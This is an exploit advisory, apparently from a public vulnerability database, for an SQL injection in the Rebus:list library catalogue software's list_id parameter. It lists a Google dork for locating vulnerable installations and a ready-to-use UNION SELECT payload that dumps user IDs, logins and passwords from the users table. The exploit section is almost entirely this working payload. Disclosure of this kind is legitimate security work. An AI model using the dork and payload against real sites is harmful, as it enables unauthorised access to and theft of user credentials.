Rebus:list SQL Injection

2013.03.19
Credit: Robert Cooper
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-89

# Exploit Title: Rebus:list SQL Injection Vulnerability # Date: 3/18/2013 # Vendor Homepage: http://www.ptfs-europe.com/products/rebus/rebuslist/ # Author: Robert Cooper (robert.cooper [at] areyousecure.net) # Tested on: [Linux/Windows 7] #Vulnerable Parameters: list_id= # Google Dork: intext: Powered by rebus:list ############################################################## Exploit: http://example.com/list.php?list_id=2' http://example.com/list.php?list_id=-2 union all select 1,2,group_concat(user_id,0x3a,login,0x3a,password) FROM users-- ############################################################## http://www.areyousecure.net # Shouts to the Belegit crew

References:

http://www.ptfs-europe.com/products/rebus/rebuslist/


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top